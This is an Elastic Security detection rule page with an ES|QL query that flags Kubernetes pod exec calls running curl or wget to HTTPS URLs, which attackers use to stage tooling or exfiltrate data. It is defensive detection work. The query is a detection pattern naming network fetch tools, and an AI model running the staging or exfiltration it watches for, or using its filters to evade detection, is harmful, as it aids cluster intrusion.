Elastic Security Detection Rules

Kubernetes Pod Exec with Curl or Wget to HTTPS

Last updated 19 days ago on 2026-04-23
Created 19 days ago on 2026-04-23

About

Detects pod or attach exec API calls where the decoded request query implies **curl** or wget fetching an **https** URL. Attackers with permission to exec into workloads often run one-liners to stage tooling, pull scripts or binaries, or exfiltrate data over HTTPS—activity that should be rare compared to shells, debuggers, or expected health checks. The rule decodes the audit requestURI, reconstructs a readable command string from repeated command parameters, and applies **noise filters** for common cluster health and OIDC/JWKS endpoints so benign automation is less likely to alert.
Tags
Data Source: KubernetesDomain: KubernetesUse Case: Threat DetectionTactic: ExecutionTactic: Command and ControlLanguage: esql
Severity
high
Risk Score
73
MITRE ATT&CK™

Execution (TA0002)(external, opens in a new tab or window)

Container Administration Command (T1609)(external, opens in a new tab or window)

Command and Control (TA0011)(external, opens in a new tab or window)

Ingress Tool Transfer (T1105)(external, opens in a new tab or window)

License
Elastic License v2(external, opens in a new tab or window)

Definition

Integration Pack
Prebuilt Security Detection Rules
Related Integrations

kubernetes(external, opens in a new tab or window)

Query
text code block:
FROM logs-kubernetes.audit_logs-* metadata _id, _index, _version
| WHERE kubernetes.audit.objectRef.subresource == "exec"
  AND kubernetes.audit.requestURI LIKE "*command=*"
| EVAL decoded_uri = URL_DECODE(kubernetes.audit.requestURI)
| GROK decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}"
| EVAL command = REPLACE(raw_commands, "command=", "")
| EVAL command = REPLACE(command, "&", " ")
| EVAL Esql.executed_command = REPLACE(command, "\\+", " ")
| WHERE Esql.executed_command IS NOT NULL 
  AND Esql.executed_command RLIKE """.*(curl.*https|wget.*https).*"""
  AND NOT Esql.executed_command RLIKE """.*(/api/v1/health|/healthz|/readyz|/livez|127\.0\.0\.1|localhost|/openid/v1/jwks|/openid-connect/certs|/.well-known/openid-configuration|/.well-known/jwks\.json|kubernetes\.default\.svc).*"""
| KEEP *

Install detection rules in Elastic Security

Detect Kubernetes Pod Exec with Curl or Wget to HTTPS in the Elastic Security detection engine by installing this rule into your Elastic Stack.

To setup this rule, check out the installation guide for Prebuilt Security Detection Rules(external, opens in a new tab or window).